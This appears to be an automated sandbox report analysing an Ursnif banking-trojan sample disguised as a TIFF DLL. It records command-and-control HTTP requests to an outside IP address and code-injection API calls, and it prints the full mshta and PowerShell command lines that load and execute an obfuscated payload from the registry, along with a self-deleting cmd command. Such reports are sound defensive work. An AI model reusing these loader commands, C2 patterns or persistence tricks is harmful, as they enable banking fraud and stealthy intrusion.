                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: rundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000014.00000003.329756539.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.329437199.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369787923.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: rundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: global trafficHTTP traffic detected: GET /drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302666274.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253266400.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253321859.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253151966.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253434533.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253537192.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253077310.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.303583479.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.299890111.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f894a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4fb6b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.369488668.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.417250518.0000000004949000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.243438048.000000000125B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302666274.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253266400.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253321859.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253151966.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253434533.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253537192.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253077310.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.303583479.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.299890111.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f894a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4fb6b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.369488668.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.417250518.0000000004949000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 626a983c091a8.tiff.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05953DB02_2_05953DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0594154D2_2_0594154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059367CA2_2_059367CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0594D7F12_2_0594D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0594FF4D2_2_0594FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593B2382_2_0593B238
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05948E57 CreateProcessAsUserW,2_2_05948E57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05946DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,2_2_05946DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059374AE NtQueryInformationProcess,2_2_059374AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_0593C431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05940782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,2_2_05940782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0594BE80 NtMapViewOfSection,2_2_0594BE80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059461AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,2_2_059461AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593710A GetProcAddress,NtCreateSection,memset,2_2_0593710A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05947950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_05947950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059400DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_059400DC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0594A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,2_2_0594A806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05945312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_05945312
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05942331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_05942331
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059364C4 memset,NtQueryInformationProcess,2_2_059364C4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,2_2_0593B7D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,2_2_0593D77A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059336BB NtGetContextThread,RtlNtStatusToDosError,2_2_059336BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059310C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,2_2_059310C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05943829 NtQuerySystemInformation,RtlNtStatusToDosError,2_2_05943829
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0594EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,2_2_0594EAC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05945220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_05945220
                      Source: 626a983c091a8.tiff.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs 626a983c091a8.tiff.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: 626a983c091a8.tiff.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 626a983c091a8.tiff.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP"Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220428Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpafcgl0.stl.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@24/17@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593EE04 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,2_2_0593EE04
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{D44018A4-23B6-2625-4D48-07BAD1FC2B8E}
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{008CBBEE-5F0F-3295-E934-03862DA8E71A}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: 626a983c091a8.tiff.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.366271329.0000000005F50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.361877271.0000000005F50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 626a983c091a8.tiff.dll
